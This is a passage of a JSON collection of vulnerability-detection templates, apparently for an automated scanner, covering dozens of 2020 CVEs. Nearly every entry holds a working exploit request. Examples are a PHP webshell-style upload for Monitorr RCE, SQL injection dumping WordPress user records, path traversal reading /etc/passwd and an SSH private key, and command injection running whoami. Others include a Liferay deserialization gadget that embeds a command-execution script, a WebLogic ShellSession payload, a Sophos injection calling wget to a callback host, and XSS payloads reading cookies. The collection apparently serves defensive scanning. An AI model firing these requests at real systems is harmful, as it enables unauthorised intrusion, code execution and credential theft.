Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD 